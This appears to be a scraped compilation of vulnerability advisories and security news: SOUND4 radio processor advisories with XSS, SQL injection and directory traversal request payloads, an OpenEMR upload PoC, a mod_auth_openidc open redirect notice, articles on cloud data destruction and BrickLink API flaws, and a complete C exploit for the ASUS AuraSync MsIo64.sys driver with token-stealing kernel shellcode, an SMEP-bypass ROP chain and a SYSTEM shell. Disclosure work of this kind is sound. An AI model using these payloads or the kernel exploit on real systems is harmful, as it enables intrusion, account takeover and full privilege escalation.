SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffer from a username persistent cross site scripting vulnerability.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (username) Stored Cross-Site ScriptingVendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: FM/HD Radio Processing:                  Impact/Pulse/First (Version 2: 1.1/2.15)                  Impact/Pulse/First (Version 1: 2.1/1.69)                  Impact/Pulse Eco 1.16                  Voice Processing:                  BigVoice4 1.2                  BigVoice2 1.30                  Web-Audio Streaming:                  Stream 1.1/2.4.29                  Watermarking:                  WM2 (Kantar Media) 1.11Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: The application suffers from an unauthenticated stored XSS vulnerabilitythat results in stored JS code and authentication bypass. The issue is triggeredwhen input passed to the 'username' parameter is not properly sanitized beforebeing returned to the user. This can be exploited to execute arbitrary HTMLand script code in a user's browser session in context of an affected site.Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5731Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5731.php26.09.2022--POST /index.php HTTP/1.1username="><script>confirm(251)</script>&password=zeroscience"

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x Persistent Cross Site Scripting

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffer from an unauthenticated directory traversal file write vulnerability.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Directory Traversal File Write ExploitVendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: FM/HD Radio Processing:                  Impact/Pulse/First (Version 2: 1.1/2.15)                  Impact/Pulse/First (Version 1: 2.1/1.69)                  Impact/Pulse Eco 1.16                  Voice Processing:                  BigVoice4 1.2                  BigVoice2 1.30                  Web-Audio Streaming:                  Stream 1.1/2.4.29                  Watermarking:                  WM2 (Kantar Media) 1.11Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: The application suffers from an unauthenticated directory traversalfile write vulnerability. Input passed through the 'filename' POST parametercalled by the 'upgrade.php' script is not properly verified before being usedto upload .upgbox Firmware files. This can be exploited to write to arbitrarylocations on the system via directory traversal attacks.Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5730Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5730.php26.09.2022--POST /cgi-bin/upload.cgi HTTP/1.1Host: RAAAADIOOOContent-Type: multipart/form-data; boundary=----zzzzzUser-Agent: TheViewing/05Accept-Encoding: gzip, deflate------zzzzzContent-Disposition: form-data; name="upgfile"; filename="../../../../../../../tmp/pwned"Content-Type: application/octet-streamt00t------zzzzzContent-Disposition: form-data; name="submit"Do it------zzzzz--

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x Directory Traversal / File Write

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffer from a username SQL injection vulnerability that allows for authentication bypass.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (username) Authentication BypassVendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: FM/HD Radio Processing:                  Impact/Pulse/First (Version 2: 1.1/2.15)                  Impact/Pulse/First (Version 1: 2.1/1.69)                  Impact/Pulse Eco 1.16                  Voice Processing:                  BigVoice4 1.2                  BigVoice2 1.30                  Web-Audio Streaming:                  Stream 1.1/2.4.29                  Watermarking:                  WM2 (Kantar Media) 1.11Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: The application suffers from an SQL Injection vulnerability. Inputpassed through the 'username' POST parameter in 'index.php' is not properlysanitised before being returned to the user or used in SQL queries. Thiscan be exploited to manipulate SQL queries by injecting arbitrary SQL codeand bypass the authentication mechanism.Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5727Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5727.php26.09.2022--POST /index.php HTTP/1.1username='+joxy--+z&password=05C13NCE

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x username SQL Injection

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffer from a password SQL injection vulnerability that allows for authentication bypass.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (password) Authentication BypassVendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: FM/HD Radio Processing:                  Impact/Pulse/First (Version 2: 1.1/2.15)                  Impact/Pulse/First (Version 1: 2.1/1.69)                  Impact/Pulse Eco 1.16                  Voice Processing:                  BigVoice4 1.2                  BigVoice2 1.30                  Web-Audio Streaming:                  Stream 1.1/2.4.29                  Watermarking:                  WM2 (Kantar Media) 1.11Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: The application suffers from an SQL Injection vulnerability. Inputpassed through the 'password' POST parameter in 'index.php' is not properlysanitised before being returned to the user or used in SQL queries. Thiscan be exploited to manipulate SQL queries by injecting arbitrary SQL codeand bypass the authentication mechanism.Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5726Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5726.php26.09.2022--POST /index.php HTTP/1.1username=t00t&password='+joxy--+z

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x password SQL Injection

It's time for on-the-record answers to questions about data destruction in cloud environments. Without access, how do you verify data has been destroyed? Do processes meet DoD standards, or do we need to adjust standards to meet reality?

These days, most big companies and many midsize ones have some form of a data-governance program, typically including policies for data retention and destruction. They have become an imperative because of increasing attacks on customer data and also state and national laws mandating protection of customer data. The old mind set of "Keep everything, forever" has changed to "If you don't have it, you can't breach it."

In some ways, managing data-retention policies has never been easier to implement in the cloud. Cloud vendors often have easy templates and click-box settings to retain your data for a specific period and then either move it to quasi-offline cold digital storage or straight to the bit bucket (deletion). Just click, configure, and move on to the next information security priority.

**Just Click Delete?**

However, I'm going to ask an awkward question, one that has been burning in my mind for a while. What really happens to that data once you click "delete" on a cloud service? In the on-premises, hardware world, we all know the answer; it would simply be deregistered on the disk it resides on. The "deleted" data still sits on the hard drive, gone from the operating system view and waiting to be overwritten when the space is needed. To truly erase it, extra steps or special software are needed to overwrite the bits with random zeros and ones. In some cases, this needs to be done multiple times to truly wipe out the phantom electronic traces of the deleted data.

And if you do business with the US government or other regulated entities, you may be required to comply with Department of Defense standard 5220.22-M, which contains specifics on data destruction requirements for contractors. These practices are common, even if not required by regulations. You don't want data you don't need any more coming back to haunt you in the event of a breach. The breach of the Twitch game-streaming service, in which hackers were able to gain access to basically all of its data going back almost to the inception of the company — including income and other personal details about its well-paid streaming clients — is a cautionary tale here, along with reports of other breaches of abandoned or orphaned data files in the last few years.

**Lack of Access to Verify**

So, while the policies are easier to set and manage in most cloud services versus on-premises servers, assuring it is properly done to the DoD standard is much harder or impossible on cloud services. How do you do a low-level disk overwrite of data on cloud infrastructure where you don't have physical access to the underlying hardware? The answer is that you can't, at least not the way we used to do it — with software utilities or outright destruction of the physical disk drive. Neither AWS, Azure, or Google Cloud Services offer any options or services that do this, not even on their dedicated instances, which run on separate hardware. You simply don't have the level of access needed to do it.

Outreach to the major services either was ignored or answered with generic statements about how they protect your data. What happens to data that is "released" in a cloud service such as AWS or Azure? Is it simply sitting on a disk, nonindexed and waiting to be overwritten, or is it put through some kind of "bit blender" to render it unusable before being returned to available storage on the service? No one, at this point, seems to know or be willing to say on the record.

**Adjust to New Reality**

We must develop a cloud-compatible way of doing destruction that meets the DoD standards, or we must stop pretending and adjust our standards to this new reality.

Maybe cloud providers can come up with a service to provide this capability, since only they have direct access to the underlying hardware. They have never been shy about inventing new services to charge for, and certainly plenty of companies would be eager to pay for such a service, if the appropriate certificates of destruction were provided. It would probably be cheaper than fees charged by some of the companies providing certified physical-destruction services.

Amazon, Azure, Google, and any major cloud service (even software-as-a-service providers) need to address these issues with real answers, not obfuscation and marketing-speak. Until then, we will just be pretending and hoping, praying some brilliant hacker doesn't figure out how to access this orphaned data, if they haven't already. Either way, the hard questions on cloud data destruction need to be asked and answered, sooner rather than later.

Data Destruction Policies in the Age of Cloud Computing

Attackers also could breach internal production data to compromise a corporate network using vulnerabilities found in the BrickLink online platform.

API flaws in a widely used Lego online marketplace could have allowed attackers to take over user accounts, leak sensitive data stored on the platform, and even gain access to internal production data to compromise corporate services, researchers have found.

Researchers from Salt Labs discovered the vulnerabilities in BrickLink, a digital resale platform owned by the Lego Group for buying and selling second-hand Legos, demonstrating that — technology-wise, anyway — not all of the company's toy pieces snap perfectly into place.

Salt Security's research arm discovered both vulnerabilities by investigating areas of the site that support user input fields, Shiran Yodev, Salts Labs security researcher, revealed in a report published on Dec. 15.

The researchers found each of the core flaws that could be exploited for attack in parts of the site that allow for user input, which they said is often a place where API security issues — a complex and costly problem for organizations — arise.

One flaw was a cross-site scripting (XSS) vulnerability that enabled them to inject and execute code on a victim end user’s machine through a crafted link, they said. The other allowed for the execution of an XML External Entity (XXE) injection attack, where an XML input containing a reference to an external entity is processed by a weakly configured XML parser.

**API Weaknesses Abound**

The researchers were careful to stress that they didn't intend to single out Lego as a particularly negligent technology provider — on the contrary, API flaws in Internet-facing applications are incredibly common, they said.

There is a key reason for that, Yodev tells Dark Reading**:** No matter the competency of an IT design and development team, API security is a new discipline that all Web developers and designers are still figuring out.

"We readily find these kinds of serious API vulnerabilities in all sorts of online services we investigate," he says. "Even companies with the most robust application security tooling and advanced security teams frequently have gaps in their API business logic."

And while both flaws could have been discovered easily through pre-production security testing, "API security is still an afterthought for many organizations," notes Scott Gerlach, co-founder and CSO at StackHawk, an API security testing provider.

"It usually doesn't come into play until after an API has already been deployed, or in other cases, organizations are using legacy tooling not built to test APIs thoroughly, leaving vulnerabilities like cross-site scripting and injection attacks undiscovered," he says.

**Personal Interest, Rapid Response**

The research to investigate Lego's BrickLink was not meant to shame and blame Lego or "make anyone look bad," but rather to demonstrate "how common these mistakes are and to educate companies on steps they can take to protect their key data and services," Yodev says.

The Lego Group is the world’s largest toy company and a massively recognizable brand that can indeed draw people's attention to the issue, the researchers said. The company earns billions of dollars in revenue per year, not only because of children's interest in using Legos but also as a result of an entire adult hobbyist community — of which Yodev admits he is one — that also collects and builds Lego sets.

Because of the popularity of Legos, BrickLink has more than 1 million members that use its site.

The researchers discovered the flaws on Oct. 18, and, to its credit, Lego responded quickly when Salt Security revealed the issues to the company on Oct. 23, confirming the disclosure within two days. Tests conducted by Salt Labs confirmed shortly after, on Nov. 10, that the issues had been resolved, the researchers said.

"However, due to Lego's internal policy, they cannot share any information regarding reported vulnerabilities, and we are therefore unable to positively confirm," Yodev acknowledges. Moreover, this policy also prevents Salt Labs from confirming or denying if attackers exploited either of the flaws in the wild, he says.

**Snapping Together the Vulnerabilities**

Researchers found the XSS flaw in the “Find Username” dialog box of BrickLinks' coupon search functionality, leading to an attack chain using a session ID exposed on a different page, they said.

"In the 'Find Username' dialog box, a user can write a free text that eventually ends up rendered into the webpage’s HTML," Yodev wrote. "Users can abuse this open field to input text that can lead to an XSS condition."

Though the researchers couldn't use the flaw on its own to mount an attack, they found an exposed session ID on a different page that they could combine with the XSS flaw to hijack a user's session and achieve account takeover (ATO), they explained.

"Bad actors could have used these tactics for full account takeover or to steal sensitive user data," Yodev wrote.

Researchers uncovered the second flaw in another part of the platform that receives direct user input, called "Upload to Wanted List," which allows BrickLink users to upload a list of wanted Lego parts and/or sets in XML format, they said.

The vulnerability was present due to how the site's XML parser uses XML External Entities, a part of the XML standard that defines a concept called an entity, or a storage unit of some type, Yodev explained in the post. In the case of the BrickLinks page, the implementation was vulnerable to a condition in which the XML processor may disclose confidential information that's typically not accessible by the application, he wrote.

Researchers exploited the flaw to mount an XXE injection attack that allows a system-file read with the permissions of the running user. This type of attack also can allow for an additional attack vector using server-side request forgery, which might enable an attacker to gain credentials for an application running on Amazon Web Services and thus breach an internal network, the researchers said.

**Avoiding Similar API Flaws**

Researchers shared some advice to help enterprises avoid creating similar API issues that can be exploited on Internet-facing applications in their own environments.

In the case of API vulnerabilities, attackers can inflict the most damage if they combine attacks on various issues or conduct them in quick succession, Yodev wrote, something the researchers demonstrated is the case with the Lego flaws.

To avoid the scenario created with the XSS flaw, organizations should follow the rule of thumb "to never trust user input," Yodev wrote. "Input should be properly sanitized and escaped," he added, referring organizations to the XSS Prevention Cheat Sheet by the Open Web Application Security Project (OWASP) for more information on this topic.

Organizations also should be careful in their implementation of session ID on Web-facing sites because it's "a common target for hackers," who can leverage it for session hijacking and account takeover, Yodev wrote.

"It is important to be very careful when handling it and not expose or misuse it for other purposes," he explained.

Finally, the easiest way to stop XXE injection attacks like the one researchers demonstrated is to completely disable External Entities in your XML parser’s configuration, the researchers said. The OWASP has another useful resource called the XXE Prevention Cheat Sheet that can guide organizations in this task, they added.

API Flaws in Lego Marketplace Put User Accounts, Data at Risk

Unrestricted Upload of File with Dangerous Type in GitHub repository openemr/openemr prior to 7.0.0.2.

**Description**

The upload functionality does not properly validate the file content-type, allowing any authenticated user to bypass this security check by adding a valid signature (p.e. GIF89) and sending any invalid content-type. This could allow an authenticated attacker to upload HTML files with JS content that will be executed in the context of the domain.

**Proof of Concept**

The following request was modified to allow uploading HTML file using a valid GIF signature, but can be modified to upload any kind of content-type:

    POST /openemr/controller.php?document&upload&patient_id=00&parent_id=1& HTTP/1.1
    Host: REDACTED
    (...snip...)
    Upgrade-Insecure-Requests: 1
    
    -----------------------------139184551113566022282519832587
    Content-Disposition: form-data; name="MAX_FILE_SIZE"
    
    64000000
    -----------------------------139184551113566022282519832587
    Content-Disposition: form-data; name="file[]"; filename="1111.txt"
    Content-Type: text/html
    
    GIF89<script>alert(document.cookie);</script>
    -----------------------------139184551113566022282519832587
    Content-Disposition: form-data; name="dicom_folder[]"; filename=""
    Content-Type: application/octet-stream
    
    (...snip...)
    -----------------------------139184551113566022282519832587--
    

The security checks where implemented using the mime_content_type function, but if it pass that filter, the file content-type was always stored as-is.

**Impact**

This could allow an attacker to write custom pages that will be shown in the context openemr domain. Those pages can contain phising html or even JS code that will be executed in the context of the active user browser.

**Occurrences**

C\_Document.class.php L297

In that line was stored the mimetype as sent. One of the solutions could be return the mimetype returned by isWhiteFile function.

CVE-2022-4506: File Upload Type Validation Error in openemr

mod_auth_openidc is an OpenID Certified™ authentication and authorization module for the Apache 2.x HTTP server. Versions prior to 2.4.12.2 are vulnerable to Open Redirect. When providing a logout parameter to the redirect URI, the existing code in oidc_validate_redirect_url() does not properly check for URLs that start with /\t, leading to an open redirect. This issue has been patched in version 2.4.12.2. Users unable to upgrade can mitigate the issue by configuring mod_auth_openidc to only allow redirection when the destination matches a given regular expression with OIDCRedirectURLsAllowed.

**Affected versions**

<=2.4.12.1

**Patched versions**

\>=2.4.12.2

**Description**

**Impact**

When providing a logout parameter to the redirect URI, the existing code in oidc_validate_redirect_url() does not properly check for URLs that start with /\t, leading to an open redirect.

**Patches**

This bug has been fixed by adding an additional check for /\t in oidc_validate_redirect_url()

**Workarounds**

This vulnerability can mitigated by configuring mod\_auth\_openidc to only allow redirection whose destination matches a given regular expression with OIDCRedirectURLsAllowed.

CVE-2022-23527: Open Redirect in oidc_validate_redirect_url() using tab character

The MsIo64.sys component in Asus Aura Sync through v1.07.79 does not properly validate input to IOCTL 0x80102040, 0x80102044, 0x80102050, and 0x80102054, allowing attackers to trigger a memory corruption and cause a Denial of Service (DoS) or escalate privileges via crafted IOCTL requests.

The kernel driver MsIo64.sys is included in Asus AuraSync 1.07.79. A stack-based buffer overflow exists in this kernel driver IOCTL dispatch function.

When you download ASUS AURA SYNC software, MsIo64.sys driver is installed together. In the IOCTL code of this driver, the memmove function is called at 0x80102040, but there is no path check at this time, so a stack based buffer overflow vulnerability may occur.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

__int64 __fastcall sub_113F0(__int64 a1, IRP *a2) {
	ULONG_PTR Src[2]; // [rsp+30h] [rbp-48h]
	...
	switch ( LowPart )
	{
		case 0x80102040:
		  DbgPrint("IOCTL_MSIO_MAPPHYSTOLIN");
		  if ( !(_DWORD)Options )
		    goto LABEL_9;
		  memmove(Src, MasterIrp, Options);
		  v11 = sub_FFFFF80375F91090((PHYSICAL_ADDRESS)Src[1], Src[0], &BaseAddress, &Handle, &Object);
		  if ( v11 >= 0 )
		  {
		    memmove(MasterIrp, Src, Options);
		    a2->IoStatus.Information = Options;
		  }
		  a2->IoStatus.Status = v11;
		  break;
	...
}

MasterIrp is lpInBuffer as an argument when calling the DeviceIoControl function. Since lpInBuffer is moved to Src, and the length is not checked, a rop attack is possible by changing the dispatch function return address.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114

#include <stdio.h>
#include <string>
#include <Windows.h>
#include <Psapi.h>
#define IOCTL_CODE 0x80102040
BYTE shellcode_[] =
"\x65\x48\x8B\x14\x25\x88\x01\x00\x00"      // mov rdx, gs:[188h]       ; _ETHREAD
"\x4C\x8B\x82\x20\x02\x00\x00"              // mov r8, [rdx + 220h]     ; _EPROCESS
"\x4D\x8B\x88\x48\x04\x00\x00"              // mov r9, [r8 + 448h]      ; ActiveProcessLinks
"\x49\x8B\x09"                              // mov rcx, [r9]            

// GetProcessByPid
"\x48\x8B\x51\xF8"                          // mov rdx, [rcx - 8]       ; UniqueProcessId
"\x48\x83\xFA\x04"                          // cmp rdx, 4               ; PID 4 SYSTEM process
"\x74\x05"                                  // jz found_system          ; SYSTEM token
"\x48\x8B\x09"                              // mov rcx, [rcx]           ; _LIST_ENTRY Flink
"\xEB\xF1"                                  // jmp find_system_proc     ; While
// FoundGetProcess

"\x48\x8B\x41\x70"                          // mov rax, [rcx + 70h]     ; Get Token
"\x24\xF0"                                  // and al, 0f0h             
// FindProcess

"\x48\x8B\x51\xF8"                          // mov rdx, [rcx-8]         ; UniqueProcessId
"\x48\x81\xFA\x00\x00\x00\x00"              // cmp rdx, 0d54h           ; if UniqueProcessId == CurrentPid
"\x74\x05"                                  // jz found_cmd             ; True - jump FoundProcess
"\x48\x8B\x09"                              // mov rcx, [rcx]           ; False - next entry
"\xEB\xEE"                                  // jmp find_cmd             ; jump FindProcess
// FoundProcess

"\x48\x89\x41\x70"                          // mov [rcx+70h], rax       ; Overwrite SYSTEM token
"\x48\x31\xc0"                              // xor rax rax 
"\x48\x31\xc9"                              // xor rcx rcx              
"\x48\x31\xf6"                              // xor rsi,rsi
"\x48\x31\xff"                              // xor rdi, rdi
"\x4D\x31\xC0"                              // xor r8, r8
"\x48\xc7\xc1\xf8\x06\x35\x00"              // mov rcx, 0x3506f8        ; original cr4
"\xc3";                                     // ret

LPVOID GetBaseAddr(const char* drvname) {
    LPVOID drivers[1024];
    DWORD cbNeeded;
    int nDrivers, i = 0;

    if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) {
        char szDrivers[1024];
        nDrivers = cbNeeded / sizeof(drivers[0]);
        for (i = 0; i < nDrivers; i++) {
            if (GetDeviceDriverBaseNameA(drivers[i], (LPSTR)szDrivers, sizeof(szDrivers) / sizeof(szDrivers[0]))) {
                if (strcmp(szDrivers, drvname) == 0) {
                    return drivers[i];
                }
            }
        }
    }
    return 0;
}

void exploit() {
    DWORD pid = GetCurrentProcessId();
    INT64 ntoskrnl = (INT64)GetBaseAddr("ntoskrnl.exe");
    HANDLE hDevice;

    hDevice = CreateFileA("\\\\.\\MsIo", FILE_READ_ACCESS | FILE_WRITE_ACCESS, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL, NULL);

    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] Error device open %d\n", GetLastError());
        exit(1);
    }
    printf("[+] Success device open\n");

    // Allocate executable memory
    BYTE* shellcode = (BYTE*)VirtualAlloc(NULL, sizeof(shellcode_), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    memcpy(shellcode, shellcode_, sizeof(shellcode_));
    memcpy(shellcode + 54, &pid, sizeof(pid));              // Change the pid of the shellcode

    INT64 disable_SMEP = 0x250ef8;                          // cr4 value, disable SMEP
    INT64 enable_SMEP = 0x350ef8;                           // cr4 value, enable SMEP
    INT64 pop_rcx = ntoskrnl + 0x314f03;                    // pop rcx; ret
    INT64 mov_cr4 = ntoskrnl + 0x9a4217;                    // mov cr4, rcx; ret
    INT64 wbinvd = ntoskrnl + 0x37fb50;                     // wbinvd; ret
    INT64 ret = pop_rcx + 1;                                // ret

    printf("[+] SMEP disabled\n");

    BYTE input[136] = { 0, };
    memset(input, 0x90, 72);                        // dummy
    memcpy(input + 72, &pop_rcx, 8);                // pop rcx
    memcpy(input + 80, &disable_SMEP, 8);           // disable SMEP value
    memcpy(input + 88, &mov_cr4, 8);                // mov cr4, rcx
    memcpy(input + 96, &wbinvd, 8);                 // wbinvd; ret
    memcpy(input + 104, &shellcode, 8);             // shellcode
    memcpy(input + 112, &mov_cr4, 8);               // mov cr4, rcx 
    memcpy(input + 120, &ret, 8);                   // restore rsp(stack)
    memcpy(input + 128, &ret, 8);                   // restore rsp(stack)

    DWORD temp;
    if (!DeviceIoControl(hDevice, IOCTL_CODE, input, sizeof(input), NULL, 0, &temp, NULL)) {
        printf("[-] Failed DeviceIoControl %d\n", GetLastError());
        exit(1);
    }

    printf("[+] SMEP enabled\n");
    printf("[+] Sucesss execute shellcode\n");
    printf("[+] Success Get SYSTEM shell\n");
    printf("\n\n");
    system("cmd");
}

int main() {
    exploit();
    return 0;
}

CVE-2022-44898: ASUS AuraSync Kernel Stack Based Buffer Overflow Local Privilege Escalation

The application suffers from an unauthenticated stored XSS vulnerability that results in stored JS code and authentication bypass. The issue is triggered when input passed to the 'username' parameter is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Title: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (username) Stored Cross-Site Scripting  
Advisory ID: ZSL-2022-5731  
Type: Local/Remote  
Impact: Cross-Site Scripting  
Risk: (5/5)  
Release Date: 14.12.2022

**Summary**

The SOUND4 IMPACT introduces an innovative process - mono and stereo parts of the signal are processed separately to obtain perfect consistency in terms of both sound and level. Therefore, in moving reception, when the FM receiver switches from stereo to mono and back to stereo, the sound variations and changes in level are reduced by over 90%. In the SOUND4 IMPACT processing chain, the stereo expander can be used substantially without any limitations.

With its advanced functionalities and impressive versatility, SOUND4 PULSE gives clients the ultimate price - performance ratio, providing much more than just a processor. Flexible and powerful, it ensures perfect sound quality and full compatibility with radio broadcasting standards and can be used simultaneously for FM and HD, DAB, DRM or streaming.

SOUND4 FIRST provides all the most important functionalities you need in an FM/HD processor and sets the bar high both in terms of performance and affordability. Designed to deliver a sound of uncompromising quality, this tool gives you 2-band processing, a digital stereo generator and an IMPACT Clipper

**Description**

The application suffers from an unauthenticated stored XSS vulnerability that results in stored JS code and authentication bypass. The issue is triggered when input passed to the 'username' parameter is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

**Vendor**

SOUND4 Ltd. - https://www.sound4.com | https://www.sound4.biz

**Affected Version**

FM/HD Radio Processing:  
Impact/Pulse/First (Version 2: 1.1/2.15)  
Impact/Pulse/First (Version 1: 2.1/1.69)  
Impact/Pulse Eco 1.16  
Voice Processing:  
BigVoice4 1.2  
BigVoice2 1.30  
Web-Audio Streaming:  
Stream 1.1/2.4.29  
Watermarking:  
WM2 (Kantar Media) 1.11

**Tested On**

Apache/2.4.25 (Unix)  
OpenSSL/1.0.2k  
PHP/7.1.1  
GNU/Linux 5.10.43 (armv7l)  
GNU/Linux 4.9.228 (armv7l)

**Vendor Status**

\[26.09.2022\] Vulnerability discovered.  
\[30.09.2022\] Vendor contacted.  
\[13.12.2022\] No response from the vendor.  
\[14.12.2022\] Public security advisory released.

**PoC**

sound4\_usr\_xss.txt

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

N/A

**Changelog**

\[14.12.2022\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

Tag

#perl